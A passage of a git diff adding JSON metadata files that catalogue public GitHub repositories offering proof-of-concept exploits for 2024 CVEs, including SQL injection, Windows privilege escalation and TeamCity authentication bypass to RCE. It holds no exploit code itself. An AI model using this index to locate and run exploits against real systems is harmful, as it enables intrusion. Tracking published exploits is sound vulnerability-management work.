+++ b/2024/CVE-2024-26026.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 798069514,
+ "name": "CVE-2024-26026",
+ "full_name": "passwa11\/CVE-2024-26026",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-26026",
+ "description": "CVE-2024-26026: BIG-IP Next Central Manager API UNAUTHENTICATED SQL INJECTION",
+ "fork": false,
+ "created_at": "2024-05-09T03:14:14Z",
+ "updated_at": "2024-06-26T02:14:55Z",
+ "pushed_at": "2024-05-09T03:15:03Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800194422,
+ "name": "Big-IP-Next-CVE-2024-26026",
+ "full_name": "GRTMALDET\/Big-IP-Next-CVE-2024-26026",
+ "owner": {
+ "login": "GRTMALDET",
+ "id": 129352872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129352872?v=4",
+ "html_url": "https:\/\/github.com\/GRTMALDET"
+ },
+ "html_url": "https:\/\/github.com\/GRTMALDET\/Big-IP-Next-CVE-2024-26026",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-13T22:04:01Z",
+ "updated_at": "2024-05-13T22:06:08Z",
+ "pushed_at": "2024-05-13T22:06:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26218.json b/2024/CVE-2024-26218.json
new file mode 100644
index 0000000000..b54c24dc9a
--- /dev/null
+++ b/2024/CVE-2024-26218.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 792427388,
+ "name": "CVE-2024-26218",
+ "full_name": "exploits-forsale\/CVE-2024-26218",
+ "owner": {
+ "login": "exploits-forsale",
+ "id": 168065072,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4",
+ "html_url": "https:\/\/github.com\/exploits-forsale"
+ },
+ "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-26218",
+ "description": "Proof-of-Concept for CVE-2024-26218",
+ "fork": false,
+ "created_at": "2024-04-26T16:41:04Z",
+ "updated_at": "2024-06-11T07:45:53Z",
+ "pushed_at": "2024-04-26T16:46:15Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26229.json b/2024/CVE-2024-26229.json
new file mode 100644
index 0000000000..b2bc535787
--- /dev/null
+++ b/2024/CVE-2024-26229.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 813202333,
+ "name": "CVE-2024-26229",
+ "full_name": "varwara\/CVE-2024-26229",
+ "owner": {
+ "login": "varwara",
+ "id": 167913816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4",
+ "html_url": "https:\/\/github.com\/varwara"
+ },
+ "html_url": "https:\/\/github.com\/varwara\/CVE-2024-26229",
+ "description": "CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I\/O Control Code",
+ "fork": false,
+ "created_at": "2024-06-10T17:02:03Z",
+ "updated_at": "2024-06-25T07:28:34Z",
+ "pushed_at": "2024-06-17T19:46:27Z",
+ "stargazers_count": 252,
+ "watchers_count": 252,
+ "has_discussions": false,
+ "forks_count": 52,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 52,
+ "watchers": 252,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 813503450,
+ "name": "CVE-2024-26229-exploit",
+ "full_name": "RalfHacker\/CVE-2024-26229-exploit",
+ "owner": {
+ "login": "RalfHacker",
+ "id": 54005327,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54005327?v=4",
+ "html_url": "https:\/\/github.com\/RalfHacker"
+ },
+ "html_url": "https:\/\/github.com\/RalfHacker\/CVE-2024-26229-exploit",
+ "description": "Windows LPE",
+ "fork": false,
+ "created_at": "2024-06-11T08:03:29Z",
+ "updated_at": "2024-06-25T17:48:57Z",
+ "pushed_at": "2024-06-11T20:41:59Z",
+ "stargazers_count": 58,
+ "watchers_count": 58,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 58,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814112073,
+ "name": "CVE-2024-26229-BOF",
+ "full_name": "NVISOsecurity\/CVE-2024-26229-BOF",
+ "owner": {
+ "login": "NVISOsecurity",
+ "id": 5310436,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5310436?v=4",
+ "html_url": "https:\/\/github.com\/NVISOsecurity"
+ },
+ "html_url": "https:\/\/github.com\/NVISOsecurity\/CVE-2024-26229-BOF",
+ "description": "BOF implementations of CVE-2024-26229 for Cobalt Strike and BruteRatel",
+ "fork": false,
+ "created_at": "2024-06-12T11:11:16Z",
+ "updated_at": "2024-06-26T01:56:20Z",
+ "pushed_at": "2024-06-13T07:30:48Z",
+ "stargazers_count": 215,
+ "watchers_count": 215,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 215,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 815768749,
+ "name": "CVE-2024-26229",
+ "full_name": "team-MineDEV\/CVE-2024-26229",
+ "owner": {
+ "login": "team-MineDEV",
+ "id": 149191616,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149191616?v=4",
+ "html_url": "https:\/\/github.com\/team-MineDEV"
+ },
+ "html_url": "https:\/\/github.com\/team-MineDEV\/CVE-2024-26229",
+ "description": "Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。 微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意行为者的主要目标。",
+ "fork": false,
+ "created_at": "2024-06-16T05:06:31Z",
+ "updated_at": "2024-06-22T16:31:32Z",
+ "pushed_at": "2024-06-16T05:29:26Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26304.json b/2024/CVE-2024-26304.json
new file mode 100644
index 0000000000..dea121273a
--- /dev/null
+++ b/2024/CVE-2024-26304.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 795875540,
+ "name": "CVE-2024-26304-RCE-exploits",
+ "full_name": "Roud-Roud-Agency\/CVE-2024-26304-RCE-exploits",
+ "owner": {
+ "login": "Roud-Roud-Agency",
+ "id": 168901291,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168901291?v=4",
+ "html_url": "https:\/\/github.com\/Roud-Roud-Agency"
+ },
+ "html_url": "https:\/\/github.com\/Roud-Roud-Agency\/CVE-2024-26304-RCE-exploits",
+ "description": "Critical RCE Vulnerabilities in HPE Aruba Devices (may 2024)",
+ "fork": false,
+ "created_at": "2024-05-04T10:09:24Z",
+ "updated_at": "2024-05-29T11:10:47Z",
+ "pushed_at": "2024-05-04T10:17:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26475.json b/2024/CVE-2024-26475.json
new file mode 100644
index 0000000000..5d1c98cfb3
--- /dev/null
+++ b/2024/CVE-2024-26475.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770100852,
+ "name": "CVE-2024-26475",
+ "full_name": "TronciuVlad\/CVE-2024-26475",
+ "owner": {
+ "login": "TronciuVlad",
+ "id": 105599724,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105599724?v=4",
+ "html_url": "https:\/\/github.com\/TronciuVlad"
+ },
+ "html_url": "https:\/\/github.com\/TronciuVlad\/CVE-2024-26475",
+ "description": "An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function.",
+ "fork": false,
+ "created_at": "2024-03-10T22:51:05Z",
+ "updated_at": "2024-05-12T19:45:47Z",
+ "pushed_at": "2024-03-10T23:44:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26503.json b/2024/CVE-2024-26503.json
new file mode 100644
index 0000000000..7ae97d54a9
--- /dev/null
+++ b/2024/CVE-2024-26503.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 772568314,
+ "name": "Exploit-CVE-2024-26503",
+ "full_name": "RoboGR00t\/Exploit-CVE-2024-26503",
+ "owner": {
+ "login": "RoboGR00t",
+ "id": 40581998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40581998?v=4",
+ "html_url": "https:\/\/github.com\/RoboGR00t"
+ },
+ "html_url": "https:\/\/github.com\/RoboGR00t\/Exploit-CVE-2024-26503",
+ "description": "Exploit for Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-03-15T13:01:43Z",
+ "updated_at": "2024-03-19T07:33:51Z",
+ "pushed_at": "2024-03-15T13:15:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-26503",
+ "exploit",
+ "openeclass",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26521.json b/2024/CVE-2024-26521.json
new file mode 100644
index 0000000000..cb85c14e63
--- /dev/null
+++ b/2024/CVE-2024-26521.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 758345985,
+ "name": "CVE-2024-26521",
+ "full_name": "hackervegas001\/CVE-2024-26521",
+ "owner": {
+ "login": "hackervegas001",
+ "id": 109858877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109858877?v=4",
+ "html_url": "https:\/\/github.com\/hackervegas001"
+ },
+ "html_url": "https:\/\/github.com\/hackervegas001\/CVE-2024-26521",
+ "description": "Html Injection vulnearbility in CE-Phoenix-v1.0.8.20 where malicious HTML code is inserted into a website. This can lead to a variety of issues, from minor website defacement to serious data breaches.",
+ "fork": false,
+ "created_at": "2024-02-16T05:40:33Z",
+ "updated_at": "2024-05-12T17:50:42Z",
+ "pushed_at": "2024-03-02T11:16:34Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26534.json b/2024/CVE-2024-26534.json
new file mode 100644
index 0000000000..2fe63ac5c0
--- /dev/null
+++ b/2024/CVE-2024-26534.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763493353,
+ "name": "CVE-2024-26534",
+ "full_name": "sajaljat\/CVE-2024-26534",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26534",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-26T11:59:59Z",
+ "updated_at": "2024-02-26T12:00:00Z",
+ "pushed_at": "2024-02-26T12:01:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26535.json b/2024/CVE-2024-26535.json
new file mode 100644
index 0000000000..f285dfcfa2
--- /dev/null
+++ b/2024/CVE-2024-26535.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763494179,
+ "name": "CVE-2024-26535",
+ "full_name": "sajaljat\/CVE-2024-26535",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26535",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-26T12:02:10Z",
+ "updated_at": "2024-02-26T12:02:10Z",
+ "pushed_at": "2024-02-26T12:02:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26560.json b/2024/CVE-2024-26560.json
new file mode 100644
index 0000000000..0685df7164
--- /dev/null
+++ b/2024/CVE-2024-26560.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763494836,
+ "name": "CVE-2024-26560",
+ "full_name": "sajaljat\/CVE-2024-26560",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-26560",
+ "description": "(XSS)",
+ "fork": false,
+ "created_at": "2024-02-26T12:03:43Z",
+ "updated_at": "2024-02-26T12:03:44Z",
+ "pushed_at": "2024-02-26T12:04:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26574.json b/2024/CVE-2024-26574.json
new file mode 100644
index 0000000000..ce6031818b
--- /dev/null
+++ b/2024/CVE-2024-26574.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 782022650,
+ "name": "CVE-2024-26574",
+ "full_name": "Alaatk\/CVE-2024-26574",
+ "owner": {
+ "login": "Alaatk",
+ "id": 21007805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4",
+ "html_url": "https:\/\/github.com\/Alaatk"
+ },
+ "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-26574",
+ "description": "Wondershare Filmora v.13.0.51 - Insecure Permissions Privilege Escalation",
+ "fork": false,
+ "created_at": "2024-04-04T13:44:08Z",
+ "updated_at": "2024-04-17T11:50:47Z",
+ "pushed_at": "2024-04-04T13:49:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2667.json b/2024/CVE-2024-2667.json
new file mode 100644
index 0000000000..38359dc342
--- /dev/null
+++ b/2024/CVE-2024-2667.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 793188530,
+ "name": "CVE-2024-2667",
+ "full_name": "Puvipavan\/CVE-2024-2667",
+ "owner": {
+ "login": "Puvipavan",
+ "id": 14966528,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14966528?v=4",
+ "html_url": "https:\/\/github.com\/Puvipavan"
+ },
+ "html_url": "https:\/\/github.com\/Puvipavan\/CVE-2024-2667",
+ "description": "This is POC for CVE-2024-2667 (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - Unauthenticated Arbitrary File Upload)",
+ "fork": false,
+ "created_at": "2024-04-28T17:14:47Z",
+ "updated_at": "2024-05-20T08:06:42Z",
+ "pushed_at": "2024-04-28T17:30:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-26817.json b/2024/CVE-2024-26817.json
new file mode 100644
index 0000000000..3cc946993b
--- /dev/null
+++ b/2024/CVE-2024-26817.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 786424034,
+ "name": "CVE-2024-26817-amdkfd",
+ "full_name": "MaherAzzouzi\/CVE-2024-26817-amdkfd",
+ "owner": {
+ "login": "MaherAzzouzi",
+ "id": 62230190,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4",
+ "html_url": "https:\/\/github.com\/MaherAzzouzi"
+ },
+ "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2024-26817-amdkfd",
+ "description": "Potential Integer Overflow Leading To Heap Overflow in AMD KFD.",
+ "fork": false,
+ "created_at": "2024-04-14T12:25:50Z",
+ "updated_at": "2024-04-15T15:01:56Z",
+ "pushed_at": "2024-04-14T12:30:21Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27130.json b/2024/CVE-2024-27130.json
new file mode 100644
index 0000000000..3c36b7e657
--- /dev/null
+++ b/2024/CVE-2024-27130.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 801938261,
+ "name": "CVE-2024-27130",
+ "full_name": "watchtowrlabs\/CVE-2024-27130",
+ "owner": {
+ "login": "watchtowrlabs",
+ "id": 99977116,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4",
+ "html_url": "https:\/\/github.com\/watchtowrlabs"
+ },
+ "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-27130",
+ "description": "PoC for CVE-2024-27130",
+ "fork": false,
+ "created_at": "2024-05-17T07:58:01Z",
+ "updated_at": "2024-06-24T13:55:18Z",
+ "pushed_at": "2024-05-17T10:27:07Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 803775593,
+ "name": "CVE-2024-27130",
+ "full_name": "d0rb\/CVE-2024-27130",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-27130",
+ "description": "This Python script is designed as a proof-of-concept (PoC) for the CVE-2024-27130 vulnerability in QNAP QTS",
+ "fork": false,
+ "created_at": "2024-05-21T11:14:22Z",
+ "updated_at": "2024-06-06T09:32:41Z",
+ "pushed_at": "2024-05-21T11:21:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27173.json b/2024/CVE-2024-27173.json
new file mode 100644
index 0000000000..781b61684c
--- /dev/null
+++ b/2024/CVE-2024-27173.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 815013986,
+ "name": "0day-POC-for-CVE-2024-27173",
+ "full_name": "Ieakd\/0day-POC-for-CVE-2024-27173",
+ "owner": {
+ "login": "Ieakd",
+ "id": 172750219,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750219?v=4",
+ "html_url": "https:\/\/github.com\/Ieakd"
+ },
+ "html_url": "https:\/\/github.com\/Ieakd\/0day-POC-for-CVE-2024-27173",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-14T07:04:46Z",
+ "updated_at": "2024-06-14T07:08:01Z",
+ "pushed_at": "2024-06-14T07:07:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-27198.json b/2024/CVE-2024-27198.json
new file mode 100644
index 0000000000..e9bb2b24c1
--- /dev/null
+++ b/2024/CVE-2024-27198.json
@@ -0,0 +1,309 @@
+[
+ {
+ "id": 767217611,
+ "name": "CVE-2024-27198",
+ "full_name": "Chocapikk\/CVE-2024-27198",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-27198",
+ "description": "Proof of Concept for Authentication Bypass in JetBrains TeamCity Pre-2023.11.4",
+ "fork": false,
+ "created_at": "2024-03-04T22:44:36Z",
+ "updated_at": "2024-06-16T13:40:04Z",
+ "pushed_at": "2024-03-05T20:53:11Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 767340674,
+ "name": "CVE-2024-27198",
+ "full_name": "yoryio\/CVE-2024-27198",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-27198",
+ "description": "Exploit for CVE-2024-27198 - TeamCity Server",
+ "fork": false,
+ "created_at": "2024-03-05T05:43:06Z",
+ "updated_at": "2024-04-30T18:04:03Z",
+ "pushed_at": "2024-03-08T06:13:09Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-27198",
+ "teamcity-server"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 767867288,
+ "name": "CVE-2024-27198-RCE",
+ "full_name": "W01fh4cker\/CVE-2024-27198-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-27198-RCE",
+ "description": "CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4",
+ "fork": false,
+ "created_at": "2024-03-06T03:15:03Z",
+ "updated_at": "2024-06-21T00:12:09Z",
+ "pushed_at": "2024-03-11T07:57:40Z",
+ "stargazers_count": 127,
+ "watchers_count": 127,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "auth",
+ "cve-2024-27198",
+ "cve-2024-27199",
+ "exploit",
+ "jetbrains",
+ "rce",
+ "redteam",
+ "teamcity"
+ ],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 127,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 768698596,
+ "name": "CVE-2024-27198",
+ "full_name": "rampantspark\/CVE-2024-27198",
+ "owner": {
+ "login": "rampantspark",
+ "id": 80992075,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80992075?v=4",
+ "html_url": "https:\/\/github.com\/rampantspark"
+ },
+ "html_url": "https:\/\/github.com\/rampantspark\/CVE-2024-27198",
+ "description": "A PoC for CVE-2024-27198 written in golang",
+ "fork": false,
+ "created_at": "2024-03-07T15:12:56Z",
+ "updated_at": "2024-03-07T16:44:20Z",
+ "pushed_at": "2024-03-10T16:57:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-27198",
+ "teamcity-2023-11-4"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 769143780,
+ "name": "CVE-2024-27198-RCE",
+ "full_name": "passwa11\/CVE-2024-27198-RCE",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-27198-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-08T12:40:09Z",
+ "updated_at": "2024-03-08T12:40:23Z",
+ "pushed_at": "2024-03-08T12:40:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 769432413,
+ "name": "CVE-2024-27198-RCE",
+ "full_name": "CharonDefalt\/CVE-2024-27198-RCE",
+ "owner": {
+ "login": "CharonDefalt",
+ "id": 103410775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103410775?v=4",
+ "html_url": "https:\/\/github.com\/CharonDefalt"
+ },
+ "html_url": "https:\/\/github.com\/CharonDefalt\/CVE-2024-27198-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-09T04:04:23Z",
+ "updated_at": "2024-03-14T02:01:22Z",
+ "pushed_at": "2024-03-09T04:09:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 769726782,
+ "name": "CVE-2024-27198-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2024-27198-EXPLOIT",
